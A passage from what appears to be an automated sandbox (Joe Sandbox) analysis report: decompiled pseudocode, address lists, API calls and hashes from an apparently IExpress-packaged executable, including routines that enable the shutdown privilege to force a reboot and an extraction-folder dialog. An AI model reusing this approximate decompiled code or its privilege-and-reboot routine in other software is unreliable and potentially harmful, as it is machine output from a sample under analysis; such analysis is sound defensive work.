                                                                        																		}
                                                                        																	} else {
                                                                        																		_t201 = _v265;
                                                                        																		 *0xf39a2c = 1;
                                                                        																		if(_t201 != 0) {
                                                                        																			_t220 =  &_v265;
                                                                        																			do {
                                                                        																				_t220 = _t220 + 1;
                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                        																				if(_t142 == 0) {
                                                                        																					_t143 = 2;
                                                                        																					 *0xf39a2c =  *0xf39a2c | _t143;
                                                                        																					goto L70;
                                                                        																				} else {
                                                                        																					_t145 = _t142 - 3;
                                                                        																					if(_t145 == 0) {
                                                                        																						 *0xf38d48 =  *0xf38d48 | 0x00000040;
                                                                        																					} else {
                                                                        																						_t146 = _t145 - 5;
                                                                        																						if(_t146 == 0) {
                                                                        																							 *0xf39a2c =  *0xf39a2c & 0xfffffffd;
                                                                        																							goto L70;
                                                                        																						} else {
                                                                        																							_t147 = _t146 - 5;
                                                                        																							if(_t147 == 0) {
                                                                        																								 *0xf39a2c =  *0xf39a2c & 0xfffffffe;
                                                                        																								goto L70;
                                                                        																							} else {
                                                                        																								_t149 = _t147;
                                                                        																								if(_t149 == 0) {
                                                                        																									 *0xf38d48 =  *0xf38d48 | 0x00000080;
                                                                        																								} else {
                                                                        																									if(_t149 == 3) {
                                                                        																										 *0xf39a2c =  *0xf39a2c | 0x00000004;
                                                                        																										L70:
                                                                        																										 *0xf38a28 = 1;
                                                                        																									} else {
                                                                        																										_t209 = 0;
                                                                        																									}
                                                                        																								}
                                                                        																							}
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				_t144 =  *_t220;
                                                                        																				_t201 = _t144;
                                                                        																			} while (_t144 != 0);
                                                                        																		}
                                                                        																	}
                                                                        																} else {
                                                                        																	 *0xf39a2c = 3;
                                                                        																	 *0xf38a28 = 1;
                                                                        																}
                                                                        																goto L50;
                                                                        															} else {
                                                                        																if(_t132 == 0) {
                                                                        																	goto L98;
                                                                        																} else {
                                                                        																	L49:
                                                                        																	_t209 = 0;
                                                                        																	L50:
                                                                        																	_t173 = _v272;
                                                                        																	if( *_t173 != 0) {
                                                                        																		goto L2;
                                                                        																	} else {
                                                                        																		break;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											goto L106;
                                                                        										}
                                                                        									} else {
                                                                        										L34:
                                                                        										_t209 = 0;
                                                                        										break;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L131;
                                                                        					}
                                                                        					if( *0xf38a2c != 0 &&  *0xf38b3e == 0) {
                                                                        						if(GetModuleFileNameA( *0xf39a3c, 0xf38b3e, 0x104) == 0) {
                                                                        							_t209 = 0;
                                                                        						} else {
                                                                        							_t202 = 0x5c;
                                                                        							 *((char*)(E00F366C8(0xf38b3e, _t202) + 1)) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t63 = _t209;
                                                                        				}
                                                                        				L131:
                                                                        			}
                                                                        0x00f35d9e
                                                                        0x00f35d51
                                                                        0x00f35d5b
                                                                        0x00f35d72
                                                                        0x00f360fb
                                                                        0x00f360fb
                                                                        0x00f36207
                                                                        0x00f3620a
                                                                        0x00f3620b
                                                                        0x00f3620e
                                                                        0x00f36217
                                                                        0x00f35d78
                                                                        0x00f35d78
                                                                        0x00f35d80
                                                                        0x00f35d83
                                                                        0x00f35d84
                                                                        0x00000000
                                                                        0x00f35d84
                                                                        0x00f35d5d
                                                                        0x00f35d5f
                                                                        0x00f35d62
                                                                        0x00f35d68
                                                                        0x00f35d64
                                                                        0x00f35d64
                                                                        0x00f35d64
                                                                        0x00000000
                                                                        0x00f35d62
                                                                        0x00f35d5b
                                                                        0x00f35d4f
                                                                        0x00f35d1d
                                                                        0x00000000
                                                                        0x00f35d9f
                                                                        0x00f35d9f
                                                                        0x00f35da5
                                                                        0x00f35dab
                                                                        0x00f35dba
                                                                        0x00f36218
                                                                        0x00f3621d
                                                                        0x00f36220
                                                                        0x00f36221
                                                                        0x00f36229
                                                                        0x00f36230
                                                                        0x00f36247
                                                                        0x00f3626a
                                                                        0x00f36272
                                                                        0x00f36249
                                                                        0x00f36255
                                                                        0x00f3625f
                                                                        0x00f36264
                                                                        0x00f36264
                                                                        0x00f36284
                                                                        0x00f35dc0
                                                                        0x00f35dc0
                                                                        0x00f35dca
                                                                        0x00f35e22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35dcc
                                                                        0x00f35dce
                                                                        0x00f35e24
                                                                        0x00f35e24
                                                                        0x00f35e2c
                                                                        0x00f35e47
                                                                        0x00f35e4a
                                                                        0x00f361d2
                                                                        0x00f361e2
                                                                        0x00f361e7
                                                                        0x00f361ee
                                                                        0x00f361f1
                                                                        0x00f361f1
                                                                        0x00f361f8
                                                                        0x00f361f8
                                                                        0x00f35e50
                                                                        0x00f35e53
                                                                        0x00f36109
                                                                        0x00f3611f
                                                                        0x00000000
                                                                        0x00f36125
                                                                        0x00f36137
                                                                        0x00f3613a
                                                                        0x00f3613c
                                                                        0x00f3613e
                                                                        0x00f3613e
                                                                        0x00f36141
                                                                        0x00f36141
                                                                        0x00f36143
                                                                        0x00f36144
                                                                        0x00f3614a
                                                                        0x00000000
                                                                        0x00f36150
                                                                        0x00f36152
                                                                        0x00f3615c
                                                                        0x00f36170
                                                                        0x00f36172
                                                                        0x00f3617c
                                                                        0x00f36190
                                                                        0x00f36190
                                                                        0x00f36196
                                                                        0x00f361a5
                                                                        0x00000000
                                                                        0x00f361ab
                                                                        0x00f361b9
                                                                        0x00f361c6
                                                                        0x00f361c6
                                                                        0x00f3617e
                                                                        0x00f36180
                                                                        0x00f3618a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3618a
                                                                        0x00f3615e
                                                                        0x00f36160
                                                                        0x00f3616a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3616a
                                                                        0x00f3615c
                                                                        0x00f3614a
                                                                        0x00f3610b
                                                                        0x00f3610e
                                                                        0x00f3610e
                                                                        0x00000000
                                                                        0x00f35e59
                                                                        0x00f35e59
                                                                        0x00f35e5c
                                                                        0x00f3604f
                                                                        0x00f36056
                                                                        0x00000000
                                                                        0x00f3605c
                                                                        0x00f3606e
                                                                        0x00f36071
                                                                        0x00f36073
                                                                        0x00f36075
                                                                        0x00f36075
                                                                        0x00f36078
                                                                        0x00f36078
                                                                        0x00f3607a
                                                                        0x00f3607b
                                                                        0x00f36081
                                                                        0x00000000
                                                                        0x00f36087
                                                                        0x00f36087
                                                                        0x00f3608d
                                                                        0x00f3609c
                                                                        0x00000000
                                                                        0x00f360a2
                                                                        0x00f360aa
                                                                        0x00f360b2
                                                                        0x00f360b7
                                                                        0x00f360bd
                                                                        0x00f360bf
                                                                        0x00f360bf
                                                                        0x00f360d6
                                                                        0x00f360e0
                                                                        0x00f360e7
                                                                        0x00f360f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f360f5
                                                                        0x00f3609c
                                                                        0x00f36081
                                                                        0x00f35e62
                                                                        0x00f35e62
                                                                        0x00f35e65
                                                                        0x00f35fd3
                                                                        0x00f35fe9
                                                                        0x00000000
                                                                        0x00f35fef
                                                                        0x00f35fef
                                                                        0x00f35ff7
                                                                        0x00f35ffd
                                                                        0x00f36003
                                                                        0x00f36006
                                                                        0x00f36011
                                                                        0x00f36014
                                                                        0x00f3603d
                                                                        0x00f36016
                                                                        0x00f36018
                                                                        0x00f36019
                                                                        0x00f3601b
                                                                        0x00f36033
                                                                        0x00f3601d
                                                                        0x00f36020
                                                                        0x00f36029
                                                                        0x00f36022
                                                                        0x00f36022
                                                                        0x00f36022
                                                                        0x00f36020
                                                                        0x00f3601b
                                                                        0x00f36042
                                                                        0x00f36044
                                                                        0x00f36046
                                                                        0x00f3604a
                                                                        0x00f35ff7
                                                                        0x00f35fd5
                                                                        0x00f35fd8
                                                                        0x00f35fd8
                                                                        0x00000000
                                                                        0x00f35e6b
                                                                        0x00f35e6b
                                                                        0x00f35e6e
                                                                        0x00f35f8b
                                                                        0x00f35f99
                                                                        0x00000000
                                                                        0x00f35f9f
                                                                        0x00f35fa7
                                                                        0x00f35faf
                                                                        0x00000000
                                                                        0x00f35fb1
                                                                        0x00f35fb3
                                                                        0x00000000
                                                                        0x00f35fb5
                                                                        0x00f35fb7
                                                                        0x00000000
                                                                        0x00f35fb9
                                                                        0x00000000
                                                                        0x00f35fb9
                                                                        0x00f35fb7
                                                                        0x00f35fb3
                                                                        0x00f35faf
                                                                        0x00f35f8d
                                                                        0x00f35f8d
                                                                        0x00f35f8d
                                                                        0x00f35f8f
                                                                        0x00f35fc1
                                                                        0x00f35fc1
                                                                        0x00f35fc1
                                                                        0x00000000
                                                                        0x00f35e74
                                                                        0x00f35e74
                                                                        0x00f35e77
                                                                        0x00f35ea0
                                                                        0x00f35ebd
                                                                        0x00f35f79
                                                                        0x00000000
                                                                        0x00f35f7f
                                                                        0x00f35ec3
                                                                        0x00f35ec3
                                                                        0x00f35ecc
                                                                        0x00f35ed4
                                                                        0x00f35ed6
                                                                        0x00f35edc
                                                                        0x00f35edf
                                                                        0x00f35eea
                                                                        0x00f35eed
                                                                        0x00f35f3f
                                                                        0x00f35f40
                                                                        0x00000000
                                                                        0x00f35eef
                                                                        0x00f35eef
                                                                        0x00f35ef2
                                                                        0x00f35f34
                                                                        0x00f35ef4
                                                                        0x00f35ef4
                                                                        0x00f35ef7
                                                                        0x00f35f2b
                                                                        0x00000000
                                                                        0x00f35ef9
                                                                        0x00f35ef9
                                                                        0x00f35efc
                                                                        0x00f35f22
                                                                        0x00000000
                                                                        0x00f35efe
                                                                        0x00f35eff
                                                                        0x00f35f02
                                                                        0x00f35f16
                                                                        0x00f35f04
                                                                        0x00f35f07
                                                                        0x00f35f0d
                                                                        0x00f35f46
                                                                        0x00f35f46
                                                                        0x00f35f09
                                                                        0x00f35f09
                                                                        0x00f35f09
                                                                        0x00f35f07
                                                                        0x00f35f02
                                                                        0x00f35efc
                                                                        0x00f35ef7
                                                                        0x00f35ef2
                                                                        0x00f35f4c
                                                                        0x00f35f4e
                                                                        0x00f35f50
                                                                        0x00f35f54
                                                                        0x00f35ed4
                                                                        0x00f35ea2
                                                                        0x00f35ea4
                                                                        0x00f35eaf
                                                                        0x00f35eaf
                                                                        0x00000000
                                                                        0x00f35e79
                                                                        0x00f35e7d
                                                                        0x00000000
                                                                        0x00f35e83
                                                                        0x00f35e83
                                                                        0x00f35e83
                                                                        0x00f35e85
                                                                        0x00f35e85
                                                                        0x00f35e8e
                                                                        0x00000000
                                                                        0x00f35e94
                                                                        0x00000000
                                                                        0x00f35e94
                                                                        0x00f35e8e
                                                                        0x00f35e7d
                                                                        0x00f35e77
                                                                        0x00f35e6e
                                                                        0x00f35e65
                                                                        0x00f35e5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35dd0
                                                                        0x00f35dd0
                                                                        0x00f35dd0
                                                                        0x00000000
                                                                        0x00f35dd0
                                                                        0x00f35dce
                                                                        0x00f35dca
                                                                        0x00f35dba
                                                                        0x00000000
                                                                        0x00f35d00
                                                                        0x00f35dd9
                                                                        0x00f35e04
                                                                        0x00f361fe
                                                                        0x00f35e0a
                                                                        0x00f35e0c
                                                                        0x00f35e17
                                                                        0x00f35e17
                                                                        0x00f35e04
                                                                        0x00f36200
                                                                        0x00f36200
                                                                        0x00000000

                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00F35CEE
                                                                        • GetModuleFileNameA.KERNEL32(00F38B3E,00000104,00000000,?,?), ref: 00F35DFC
                                                                        • CharUpperA.USER32(?), ref: 00F35E3E
                                                                        • CharUpperA.USER32(-00000052), ref: 00F35EE1
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00F35F6F
                                                                        • CharUpperA.USER32(?), ref: 00F35FA7
                                                                        • CharUpperA.USER32(-0000004E), ref: 00F36008
                                                                        • CharUpperA.USER32(?), ref: 00F360AA
                                                                        • CloseHandle.KERNEL32(00000000,00F31140,00000000,00000040,00000000), ref: 00F361F1
                                                                        • ExitProcess.KERNEL32 ref: 00F361F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                        • String ID: "$"$:$RegServer
                                                                        • API String ID: 1203814774-25366791
                                                                        • Opcode ID: 698604415c508b28aca737a991957a25190da456946e3272abe9eda7148d5852
                                                                        • Instruction ID: 964560bd9b41a068dfaa7087030058dfa6bfd25377fa1e4a616e06c2734d6e89
                                                                        • Opcode Fuzzy Hash: 698604415c508b28aca737a991957a25190da456946e3272abe9eda7148d5852
                                                                        • Instruction Fuzzy Hash: B9D19171E08A486EDF35CB388C483FA3762AB95B74F1441A5D4D6DA151DAB48EC2BF00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E00F31F90(signed int __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				signed int _t13;
                                                                        				int _t21;
                                                                        				void* _t25;
                                                                        				int _t28;
                                                                        				signed char _t30;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				signed int _t46;
                                                                        
                                                                        				_t41 = __esi;
                                                                        				_t38 = __edi;
                                                                        				_t30 = __ecx;
                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                        					L12:
                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                        						L14:
                                                                        						if( *0xf39a40 != 0) {
                                                                        							_pop(_t30);
                                                                        							_t44 = _t46;
                                                                        							_t13 =  *0xf38004; // 0xc69e30f7
                                                                        							_v8 = _t13 ^ _t46;
                                                                        							_push(_t38);
                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                        								_v24.PrivilegeCount = 1;
                                                                        								_v12 = 2;
                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                        								CloseHandle(_v28);
                                                                        								_t41 = _t41;
                                                                        								_push(0);
                                                                        								if(_t21 != 0) {
                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                        										_t25 = 1;
                                                                        									} else {
                                                                        										_t37 = 0x4f7;
                                                                        										goto L3;
                                                                        									}
                                                                        								} else {
                                                                        									_t37 = 0x4f6;
                                                                        									goto L4;
                                                                        								}
                                                                        							} else {
                                                                        								_t37 = 0x4f5;
                                                                        								L3:
                                                                        								_push(0);
                                                                        								L4:
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								E00F344B9(0, _t37);
                                                                        								_t25 = 0;
                                                                        							}
                                                                        							_pop(_t40);
                                                                        							return E00F36CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                        						} else {
                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                        							goto L16;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = 0x522;
                                                                        						_t28 = E00F344B9(0, 0x522, 0xf31140, 0, 0x40, 4);
                                                                        						if(_t28 != 6) {
                                                                        							goto L16;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					__eax = E00F31EA7(__ecx);
                                                                        					if(__eax != 2) {
                                                                        						L16:
                                                                        						return _t28;
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00F31EFB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F31F02
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00F31FD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2795981589-3733053543
                                                                        • Opcode ID: 9c6018ed84b5d4a2ef5d78d4c63eeea8cc18397eeecc55648ed091949cc3fbc8
                                                                        • Instruction ID: 591dad878ceca979c77bcd0b92b5dcb30ef5b0e779807e6a63682dbc9f4022d5
                                                                        • Opcode Fuzzy Hash: 9c6018ed84b5d4a2ef5d78d4c63eeea8cc18397eeecc55648ed091949cc3fbc8
                                                                        • Instruction Fuzzy Hash: B421CCB1F402097BDB205BB19C4AFBF76BDFB85771F100019FA02D6185D7759841B661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F36CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                        
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				UnhandledExceptionFilter(_a4);
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



                                                                        0x00f36cf7
                                                                        0x00f36d00
                                                                        0x00f36d19

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F36E26,00F31000), ref: 00F36CF7
                                                                        • UnhandledExceptionFilter.KERNEL32(00F36E26,?,00F36E26,00F31000), ref: 00F36D00
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00F36E26,00F31000), ref: 00F36D0B
                                                                        • TerminateProcess.KERNEL32(00000000,?,00F36E26,00F31000), ref: 00F36D12
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID:
                                                                        • API String ID: 3231755760-0
                                                                        • Opcode ID: 767eb71ffbb81deb6b9777d01eeb15bb6d96878e02cbb7846f79f2c2a5fbd9c6
                                                                        • Instruction ID: 657d1e74c4bf8f36ce50d4d3b705cd4fc4c00e9fe984705da736655bee51822e
                                                                        • Opcode Fuzzy Hash: 767eb71ffbb81deb6b9777d01eeb15bb6d96878e02cbb7846f79f2c2a5fbd9c6
                                                                        • Instruction Fuzzy Hash: ABD0C93200020CBBDB003BE2EC0CA593F2AEB48236F444004F35982021CA724451AF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00F33210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* _t6;
                                                                        				void* _t10;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				int _t23;
                                                                        				char _t24;
                                                                        				long _t25;
                                                                        				int _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				int _t38;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        				void* _t46;
                                                                        				CHAR* _t49;
                                                                        				void* _t58;
                                                                        				void* _t63;
                                                                        				struct HWND__* _t64;
                                                                        
                                                                        				_t64 = _a4;
                                                                        				_t6 = _a8 - 0x10;
                                                                        				if(_t6 == 0) {
                                                                        					_push(0);
                                                                        					L38:
                                                                        					EndDialog(_t64, ??);
                                                                        					L39:
                                                                        					__eflags = 1;
                                                                        					return 1;
                                                                        				}
                                                                        				_t42 = 1;
                                                                        				_t10 = _t6 - 0x100;
                                                                        				if(_t10 == 0) {
                                                                        					E00F343D0(_t64, GetDesktopWindow());
                                                                        					SetWindowTextA(_t64, "lenta");
                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                        					__eflags =  *0xf39a40 - _t42; // 0x3
                                                                        					if(__eflags == 0) {
                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                        					}
                                                                        					L36:
                                                                        					return _t42;
                                                                        				}
                                                                        				if(_t10 == _t42) {
                                                                        					_t20 = _a12 - 1;
                                                                        					__eflags = _t20;
                                                                        					if(_t20 == 0) {
                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xf391e4, 0x104);
                                                                        						__eflags = _t21;
                                                                        						if(_t21 == 0) {
                                                                        							L32:
                                                                        							_t58 = 0x4bf;
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							L25:
                                                                        							E00F344B9(_t64, _t58);
                                                                        							goto L39;
                                                                        						}
                                                                        						_t49 = 0xf391e4;
                                                                        						do {
                                                                        							_t23 =  *_t49;
                                                                        							_t49 =  &(_t49[1]);
                                                                        							__eflags = _t23;
                                                                        						} while (_t23 != 0);
                                                                        						__eflags = _t49 - 0xf391e5 - 3;
                                                                        						if(_t49 - 0xf391e5 < 3) {
                                                                        							goto L32;
                                                                        						}
                                                                        						_t24 =  *0xf391e5; // 0x3a
                                                                        						__eflags = _t24 - 0x3a;
                                                                        						if(_t24 == 0x3a) {
                                                                        							L21:
                                                                        							_t25 = GetFileAttributesA(0xf391e4);
                                                                        							__eflags = _t25 - 0xffffffff;
                                                                        							if(_t25 != 0xffffffff) {
                                                                        								L26:
                                                                        								E00F3658A(0xf391e4, 0x104, 0xf31140);
                                                                        								_t27 = E00F358C8(0xf391e4);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 != 0) {
                                                                        									__eflags =  *0xf391e4 - 0x5c;
                                                                        									if( *0xf391e4 != 0x5c) {
                                                                        										L30:
                                                                        										_t30 = E00F3597D(0xf391e4, 1, _t64, 1);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											L35:
                                                                        											_t42 = 1;
                                                                        											__eflags = 1;
                                                                        											goto L36;
                                                                        										}
                                                                        										L31:
                                                                        										_t42 = 1;
                                                                        										EndDialog(_t64, 1);
                                                                        										goto L36;
                                                                        									}
                                                                        									__eflags =  *0xf391e5 - 0x5c;
                                                                        									if( *0xf391e5 == 0x5c) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                                        								}
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t58 = 0x4be;
                                                                        								goto L25;
                                                                        							}
                                                                        							_t32 = E00F344B9(_t64, 0x54a, 0xf391e4, 0, 0x20, 4);
                                                                        							__eflags = _t32 - 6;
                                                                        							if(_t32 != 6) {
                                                                        								goto L35;
                                                                        							}
                                                                        							_t33 = CreateDirectoryA(0xf391e4, 0);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0xf391e4);
                                                                        							_t58 = 0x4cb;
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags =  *0xf391e4 - 0x5c;
                                                                        						if( *0xf391e4 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _t24 - 0x5c;
                                                                        						if(_t24 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t34 = _t20 - 1;
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						EndDialog(_t64, 0);
                                                                        						 *0xf39124 = 0x800704c7;
                                                                        						goto L39;
                                                                        					}
                                                                        					__eflags = _t34 != 0x834;
                                                                        					if(_t34 != 0x834) {
                                                                        						goto L36;
                                                                        					}
                                                                        					_t37 = LoadStringA( *0xf39a3c, 0x3e8, 0xf38598, 0x200);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 != 0) {
                                                                        						_t38 = E00F34224(_t64, _t46, _t46);
                                                                        						__eflags = _t38;
                                                                        						if(_t38 == 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xf387a0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t63 = 0x4c0;
                                                                        						L9:
                                                                        						E00F344B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						goto L38;
                                                                        					}
                                                                        					_t63 = 0x4b1;
                                                                        					goto L9;
                                                                        				}
                                                                        				return 0;
                                                                        			}


                                                                        APIs
                                                                        • LoadStringA.USER32(000003E8,00F38598,00000200), ref: 00F33271
                                                                        • GetDesktopWindow.USER32 ref: 00F333E2
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 00F333F7
                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00F33410
                                                                        • GetDlgItem.USER32(?,00000836), ref: 00F33426
                                                                        • EnableWindow.USER32(00000000), ref: 00F3342D
                                                                        • EndDialog.USER32(?,00000000), ref: 00F3343F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                        • API String ID: 2418873061-4193562306
                                                                        • Opcode ID: bbe48c39cac7f4f4b305f079bcc5ad354007771f8e357caa9037f2b81ba97535
                                                                        • Instruction ID: 0d211dda1c388f598023cfd6f0a5123fd4133879cbef7a70aa9e8e11f1757247
                                                                        • Opcode Fuzzy Hash: bbe48c39cac7f4f4b305f079bcc5ad354007771f8e357caa9037f2b81ba97535
                                                                        • Instruction Fuzzy Hash: 2C5149307402447BEB21EB369C8CF7B395ADB86B71F108128F685A61D0CAF8DA01B661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F32CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t13;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				struct HRSRC__* _t31;
                                                                        				intOrPtr _t33;
                                                                        				void* _t43;
                                                                        				void* _t48;
                                                                        				signed int _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t13 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t13 ^ _t67;
                                                                        				_t65 = 0;
                                                                        				_t66 = __ecx;
                                                                        				_t48 = __edx;
                                                                        				 *0xf39a3c = __ecx;
                                                                        				memset(0xf39140, 0, 0x8fc);
                                                                        				memset(0xf38a20, 0, 0x32c);
                                                                        				memset(0xf388c0, 0, 0x104);
                                                                        				 *0xf393ec = 1;
                                                                        				_t20 = E00F3468F("TITLE", 0xf39154, 0x7f);
                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                        					_t64 = 0x4b1;
                                                                        					goto L32;
                                                                        				} else {
                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                        					 *0xf3858c = _t27;
